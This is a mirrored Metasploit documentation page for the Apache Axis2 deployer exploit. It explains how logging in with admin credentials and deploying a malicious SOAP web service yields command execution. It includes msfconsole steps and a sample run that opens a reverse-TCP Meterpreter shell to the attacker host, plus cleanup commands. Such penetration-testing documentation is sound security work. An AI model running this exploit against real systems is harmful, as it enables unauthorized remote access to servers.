CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/documentation/modules/exploit/multi/http/axis2_deployer.md
Views: 1904

Description

This module logs in to an Axis2 Web Admin Module instance using a specific user/pass and uploads and executes commands via deploying a malicious web service by using SOAP.

Axis2 Web Admin

The Apache Axis2 Web application has three main sections:'Services' lists all the available services deployed in this server, 'Validate' checks the system to see whether all the required libraries are in place and views the system information, and 'Administration' is the Axis2 Web Administration module which is the console for administering the Apache Axis2 installation. The Axis2 Web Administration module provides a way to configure Axis2 dynamically.

IMPORTANT: This dynamic configuration will NOT be persistent, i.e., if the servlet container is restarted, then all the dynamic configuration changes will be lost.

Verification Steps

  1. Do: use exploit/multi/http/axis2_deployer

  2. Do: set RHOSTS [IP]

  3. Do: set RPORT [PORT]

  4. Do: set USERNAME [Username]

  5. Do: set PASSWORD [Password]

  6. Do: run

Scenarios

msf > use exploit/multi/http/axis2_deployer
msf exploit(axis2_deployer) > set RHOST 10.10.155.37
RHOST => 10.10.155.37
msf exploit(axis2_deployer) > set RPORT 8080
RPORT => 8080
msf exploit(axis2_deployer) > set USERNAME admin
USERNAME => admin
msf exploit(axis2_deployer) > set PASSWORD admin123
PASSWORD => admin123
msf exploit(axis2_deployer) > exploit

[*] Started reverse TCP handler on 10.10.155.39:4444 
[+] http://10.10.155.37:8080/axis2/axis2-admin [Apache-Coyote/1.1] [Axis2 Web Admin Module] successful login 'admin' : 'axis2'
[*] Successfully uploaded
[*] Polling to see if the service is ready
[*] Sending stage (30355 bytes) to 10.10.155.37
[*] Meterpreter session 3 opened (10.10.155.39:4444 -> 10.10.155.37:1750) at 2017-03-26 23:33:19 -0500

[*] NOTE: You will need to delete the web service that was uploaded.

[*] Using meterpreter:
[*] rm "webapps/axis2/WEB-INF/services/mdLFvgMv.jar"

[*] Using the shell:
[*] cd  "webapps/axis2/WEB-INF/services"
[*] del mdLFvgMv.jar


meterpreter > getuid
Server username: Administrator
meterpreter > sysinfo
Computer    : juan-6ed9db6ca8
OS          : Windows 2003 5.2 (x86)
Meterpreter : java/java
meterpreter > exit
[*] Shutting down Meterpreter...